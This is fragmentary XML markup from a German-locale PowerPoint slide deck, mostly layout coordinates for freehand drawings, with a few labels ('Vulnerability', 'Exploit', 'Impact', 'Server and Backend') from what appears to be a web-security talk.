                    <p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4170526" y="1004354"/>
                      <a:ext cx="55080" cy="31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94206" y="1089674"/>
                    <a:ext cx="177480" cy="33120"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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4085206" y="1080674"/>
                      <a:ext cx="195120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94726" y="1167794"/>
                    <a:ext cx="118080" cy="118080"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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4286086" y="1158794"/>
                      <a:ext cx="135720" cy="13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23966" y="1165634"/>
                    <a:ext cx="57240" cy="108360"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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4414966" y="1156994"/>
                      <a:ext cx="7488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1">
                  <p14:nvContentPartPr>
                    <p14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35926" y="1176794"/>
                    <a:ext cx="124920" cy="109080"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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:cNvPr>
                    <p:cNvPicPr/>
                    <p:nvPr/>
                  </p:nvPicPr>
                  <p:blipFill>
                    <a:blip r:embed="rId152"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </p:blipFill>
                  <p:spPr>
                    <a:xfrm>
                      <a:off x="4526926" y="1168154"/>
                      <a:ext cx="142560" cy="12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3">
                  <p14:nvContentPartPr>
                    <p14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2006" y="1061234"/>
                    <a:ext cx="24120" cy="229320"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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:cNvPr>
                    <p:cNvPicPr/>
                    <p:nvPr/>
                  </p:nvPicPr>
                  <p:blipFill>
                    <a:blip r:embed="rId154"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </p:blipFill>
                  <p:spPr>
                    <a:xfrm>
                      <a:off x="4663366" y="1052594"/>
                      <a:ext cx="41760" cy="246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5">
                  <p14:nvContentPartPr>
                    <p14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06926" y="1144034"/>
                    <a:ext cx="78120" cy="140040"/>
                  </p14:xfrm>
                </p:contentPart>
              </mc:Choice>
              <mc:Fallback xmlns="">
                <p:pic>
                  <p:nvPicPr>
                    <p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:cNvPr>
                    <p:cNvPicPr/>
                    <p:nvPr/>
                  </p:nvPicPr>
                  <p:blipFill>
                    <a:blip r:embed="rId156"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </p:blipFill>
                  <p:spPr>
                    <a:xfrm>
                      <a:off x="4697926" y="1135394"/>
                      <a:ext cx="95760" cy="157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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4830766" y="1146554"/>
                  <a:ext cx="120960" cy="11592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4822126" y="1137554"/>
                    <a:ext cx="13860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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4994566" y="1115954"/>
                  <a:ext cx="96480" cy="1630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4985926" y="1106954"/>
                    <a:ext cx="114120" cy="180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92D00B66-3C9C-4F21-9A79-2112801EDF94}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="688966" y="840914"/>
              <a:ext cx="1555200" cy="87840"/>
              <a:chOff x="688966" y="840914"/>
              <a:chExt cx="1555200" cy="8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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="688966" y="914354"/>
                  <a:ext cx="91440" cy="144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679966" y="905354"/>
                    <a:ext cx="10908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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="889846" y="886274"/>
                  <a:ext cx="97200" cy="1368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81206" y="877634"/>
                    <a:ext cx="11484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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1107286" y="886994"/>
                  <a:ext cx="109080" cy="1296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098286" y="878354"/>
                    <a:ext cx="1267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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1324366" y="876914"/>
                  <a:ext cx="93600" cy="1044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315726" y="867914"/>
                    <a:ext cx="11124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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1533886" y="882314"/>
                  <a:ext cx="93600" cy="90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1524886" y="873674"/>
                    <a:ext cx="11124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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1716046" y="878714"/>
                  <a:ext cx="116640" cy="576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1707406" y="870074"/>
                    <a:ext cx="13428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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1964446" y="857114"/>
                  <a:ext cx="87840" cy="864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1955806" y="848474"/>
                    <a:ext cx="10548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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2154526" y="840914"/>
                  <a:ext cx="89640" cy="15480"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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2145886" y="831914"/>
                    <a:ext cx="107280" cy="33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6A2667DA-1D0B-4736-91E9-C9DC245888FF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BBCA3EFC-F2B5-42B0-9949-D43006EE228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B81C4DA9-136E-46C3-A3F0-B8C6C8DAC68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55A3802D-697F-4F8B-A476-E55C74D1CD37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58A1CD34-CC25-4F15-87DB-7FACEA8C5BF8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583C8456-5B00-4034-A6C8-3FBA2143F17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34BBCCB0-CBCC-405C-BC8C-8A2C9B902D9E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BBD9F313-DF82-4312-9B46-B2F844935EB2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D4304B06-450B-46A9-9AE3-FDC548E6B226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7802B83-3074-4DF2-81F1-E9E16F1E45BE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571C1EF-94F3-4183-ABE1-E22628A2CE8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086AD85D-A484-45F4-AB7C-032EC876B82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B6473CC8-DA6A-40B5-963E-1CC1F2E957B5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0804778E-0B2E-400D-8AE3-45B4685E2BD3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8EFD220-4219-466A-839C-7F271210422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1D2F212D-031B-4156-AEEE-46E159A2626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003A127A-3C1F-4CCF-A522-4F0CD6AD13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B051F1B6-8119-4B16-AACF-553D67C24C67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BA88B18C-04FD-4C9D-896F-1727EB892E4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858AB5DD-D9A8-47E0-B345-76CDA57C5F4C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97ED851-5B73-4766-882E-C8C37C6BC7B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51A612FD-57EE-4D98-913E-1B6C23FB26B6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7916D1A2-F1C5-45D8-95B0-DE23951564BC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1D75CC5-1E48-48F8-B234-9018A38E1BDF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9480245B-8A91-4863-BB1B-3CB7337B823B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E4504C9-A1D0-4EB3-9ED6-DD5168D4043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B4DA493-72A3-410E-9AC1-49594BB1C12D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AAABE017-CEF5-4512-A009-23B4482A02B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69D103B-06A7-4EE0-A767-2624CC701B5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1078580-5FF5-414E-B639-1A7F42CC8FF6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37BE4153-B593-4825-A1BA-F435F895606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5269D2B6-5480-4E38-A7B5-EC24A9642B4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A1F6BD4D-91DB-4ADA-AF53-95B9C4C73A5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8A1EA4CD-D130-4C70-B1F4-4394F1D2F86B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D2BDCB6A-9BA9-4CF5-9423-AB0ACE1D1F1E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28774F24-3F73-4150-9B7A-C39560B31D70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E1FA404D-2C3B-46A4-8821-E9D5ACD6806F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0AB5A588-4827-4226-B7F3-FF87F2CD9A1B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B060D84E-942D-4EA3-9596-E5037D79E6A3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B4063F82-0065-48E4-AF00-0EE47FF490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0D0DC01E-4FED-48D4-AB08-344DC5B08926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E7D38EF3-1DAC-4DD6-A409-A9B9CDB4B490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DBD0400-3885-4E69-AD13-2C7DAEF8D8D2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D9116B87-0066-4D46-A1BC-E2F0E8E8F98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4E41B52F-580D-4C8C-B7A3-3665A2B63619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7CF079E4-1E21-498E-8EFD-F2F62723981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2D2533E-B2DA-4631-AD15-77A50FDE64A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64FAF5DD-D5D8-4380-BA87-4C0D936E0B89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161" name="Grafik 160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{650E71EB-FD4C-4EE0-943A-FB4FB1782AE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId271"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6991057" y="3762072"/>
            <a:ext cx="4928089" cy="1215546"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Textfeld 161">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56DE9CAD-A77E-4E81-B414-B874F9C12F0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8135658" y="5396058"/>
            <a:ext cx="3143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Vulnerability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AB2A75D5-E2E1-4848-B9B1-296933BD18BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8952784" y="6106885"/>
            <a:ext cx="1624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Impact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8D8262F9-FC33-4F03-98D7-10E0DE8BE2BA}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="9199366" y="5412194"/>
              <a:ext cx="4320" cy="468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8D8262F9-FC33-4F03-98D7-10E0DE8BE2B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190366" y="5403554"/>
                <a:ext cx="21960" cy="22320"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent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4009698C-E8AF-4CD9-A12F-A6CF49FD3F24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="162" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9707640" y="4724400"/>
            <a:ext cx="2" cy="671658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A15215E6-D52A-4822-AE03-F3199613A06C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="163" idx="1"/>
            <a:endCxn id="21" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5724508" y="5183276"/>
            <a:ext cx="3228276" cy="1215997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feld 164">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C6C7B88-86B7-44C3-954C-2D94B3F17D7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2928664" y="617129"/>
            <a:ext cx="3143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Exploit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A7E277E2-3F3B-4421-A660-AC8322371887}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="165" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2329876" y="899954"/>
            <a:ext cx="598788" cy="9563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2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3" grpId="0"/>
      <p:bldP spid="1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Server and Backend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0DEAF5-45B8-43C1-B832-E9BE0FC4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?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2856325-D774-4AC8-8D5C-523381E76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17" y="3537807"/>
            <a:ext cx="6715125" cy="2247900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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8AC200BD-41E9-40D7-88E2-0152FCB24223}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142247" y="1841619"/>
            <a:ext cx="9339943" cy="7266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3200" dirty="0" err="1"/>
              <a:t>wouldn‘t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0" err="1"/>
              <a:t>this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r>
              <a:rPr lang="de-DE" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0" err="1"/>
              <a:t>easier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="3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208909C-2F39-4984-9FF4-939090795C33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="698150" y="2891476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/coiframe.html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darkside.me</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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00BB41B2-C8DE-4903-84CD-9275792796AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="20730224">
            <a:off x="8262165" y="3574711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1AA37414-C8CC-4B5E-82F0-D4B02D69A596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CF10BC8E-1CDD-4C0B-BC5B-9EB306F6E940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A540F6E3-760A-4C31-89CC-423CFBC56304}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7674978" y="2608866"/>
            <a:ext cx="1629720" cy="936720"/>
            <a:chOff x="656095" y="424854"/>
            <a:chExt cx="1629720" cy="936720"/>
          </a:xfrm>
        </p:grpSpPr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BB8AF344-908A-4B2A-8060-D3C8A6DE1BD5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="656095" y="424854"/>
              <a:ext cx="1629720" cy="936720"/>
              <a:chOff x="1065608" y="369674"/>
              <a:chExt cx="1629720" cy="93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8D3771F3-8D4D-440C-8E8A-EF466623E483}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1065608" y="417194"/>
                  <a:ext cx="46800" cy="888480"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="10" name="Freihand 9">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D1B89FF-8C8D-45C5-8837-9055BC1883FA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056968" y="408554"/>
                    <a:ext cx="64440" cy="90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7058D3BB-FBDB-478D-9FA1-43B4E3B3DD0A}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1119968" y="371114"/>
                  <a:ext cx="1480320" cy="6264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3085F9CD-51B8-4362-8D00-C832AA2EBA5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110968" y="362474"/>
                    <a:ext cx="149796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1625F5DE-7DB5-4B5B-AE7F-0B8DE06EFAE8}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1085048" y="1257794"/>
                  <a:ext cx="1575720" cy="4860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A82FFF48-92CC-47C0-94E5-6C9F963FD960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076408" y="1248794"/>
                    <a:ext cx="159336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72" name="Freihand 171">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF142A83-A5E7-41FD-A661-7CC8942D6678}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2617928" y="369674"/>
                  <a:ext cx="77400" cy="89064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E1513140-B5EF-417C-AC9E-74C1A6C90D6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609288" y="360674"/>
                    <a:ext cx="95040" cy="90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3FB08647-9870-4A3A-91F5-139A334F90EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="838615" y="547149"/>
              <a:ext cx="1353960" cy="245880"/>
              <a:chOff x="1248128" y="723194"/>
              <a:chExt cx="1353960" cy="24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883A2ED4-2F70-47BF-81D6-1B35858929F5}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1248128" y="844874"/>
                  <a:ext cx="147600" cy="12420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AD9C54D5-2DF8-4D1E-8238-E76727F4568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39128" y="835874"/>
                    <a:ext cx="16524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1301D84B-5066-47EA-B3D6-7E4C6C1975DF}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1398968" y="723194"/>
                  <a:ext cx="17280" cy="235080"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="32" name="Freihand 31">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C8E4168-69D5-4EF9-B15A-BA2AEB1C4A4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389968" y="714194"/>
                    <a:ext cx="3492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204B3D6D-68AD-45C8-9664-C5E108D9C3D7}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1460888" y="838394"/>
                  <a:ext cx="109440" cy="114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09ECF8A4-8D1D-4BC3-BEF3-9BDAA8FF274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452248" y="829754"/>
                    <a:ext cx="12708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CACA86F2-BAF8-4433-956C-AB288F7AEFB7}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1565288" y="845954"/>
                  <a:ext cx="29160" cy="979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8F93437B-F85D-4125-9687-30B1E3B75B3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556288" y="837314"/>
                    <a:ext cx="468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751E0C78-4AF8-442E-870D-C73498BB8EBE}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1608488" y="816794"/>
                  <a:ext cx="86040" cy="111960"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="35" name="Freihand 34">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84E64A6B-6FB7-43DE-80E0-65255AB3A23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599848" y="808154"/>
                    <a:ext cx="10368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94EDAB85-CFA4-4B68-91B0-DBC3FFB30796}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1729088" y="749114"/>
                  <a:ext cx="19080" cy="177840"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="37" name="Freihand 36">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C61834A8-3C09-45B1-8F64-F7BD144E338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720088" y="740474"/>
                    <a:ext cx="3672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EF28CF11-213F-4C1B-9FF9-E88323DC558A}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1747808" y="803834"/>
                  <a:ext cx="59040" cy="121320"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="38" name="Freihand 37">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3888D57B-0D40-4506-BAAB-43F8EFF1791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738808" y="794834"/>
                    <a:ext cx="7668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FE31EFCF-3E82-435B-A885-A4753C61D19F}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1821968" y="812474"/>
                  <a:ext cx="93600" cy="111600"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="39" name="Freihand 38">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88C06193-57BE-4019-A4DF-25421FFD40E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812968" y="803834"/>
                    <a:ext cx="1112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23E3207D-564E-4BF6-8EF4-870CEBE0ED1B}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1953728" y="836594"/>
                  <a:ext cx="31680" cy="1076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F475C2A7-DEE6-48C4-8194-9406A151CC4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945088" y="827594"/>
                    <a:ext cx="4932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6C852D19-8FC1-430D-866E-FFC0E7596223}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1938608" y="751634"/>
                  <a:ext cx="4320" cy="1188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797DE076-AC42-4D1D-94B1-3F086177FB4D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929608" y="742994"/>
                    <a:ext cx="2196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19538CBC-D12D-4560-B1E6-88479BA6F350}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2019608" y="835154"/>
                  <a:ext cx="97200" cy="89280"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="43" name="Freihand 42">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{616627CC-73E0-4CB2-8533-84B697FF8B5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010968" y="826154"/>
                    <a:ext cx="1148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43271055-387A-497D-986E-923ACDCC83BF}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2131568" y="742634"/>
                  <a:ext cx="17280" cy="183600"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="44" name="Freihand 43">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9849DAD0-18DC-4394-9FBF-2B0D187642F6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122928" y="733994"/>
                    <a:ext cx="3492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A604E82E-0245-4A1E-8872-AE77E634A436}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2175128" y="831914"/>
                  <a:ext cx="89640" cy="81360"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="45" name="Freihand 44">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DFB1F97-AB0F-423E-BD04-196C3D196E09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166128" y="823274"/>
                    <a:ext cx="10728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46CD9D45-CEBC-4D5A-A515-47AFA99B1EF5}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2296808" y="902114"/>
                  <a:ext cx="10440" cy="5400"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="46" name="Freihand 45">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DB4AFCE-254A-49A8-AA5D-CFF78F94A35E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288168" y="893114"/>
                    <a:ext cx="2808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028419B7-B0A6-42F0-BAD7-8EC412F8B458}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2353328" y="810314"/>
                  <a:ext cx="108360" cy="109080"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="47" name="Freihand 46">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E77E990-208C-4857-B2CA-ECAF050427F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344688" y="801674"/>
                    <a:ext cx="12600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F5E947A7-8A6A-469C-A99B-21BA95F1CAD5}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2498408" y="810314"/>
                  <a:ext cx="103680" cy="97920"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="48" name="Freihand 47">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8DD2A25-0767-4B5D-B361-51B1581E9B9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489768" y="801314"/>
                    <a:ext cx="121320" cy="115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D21A25F1-193F-419B-AC9D-7B65C1ABBF46}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="812335" y="995367"/>
              <a:ext cx="1361520" cy="318240"/>
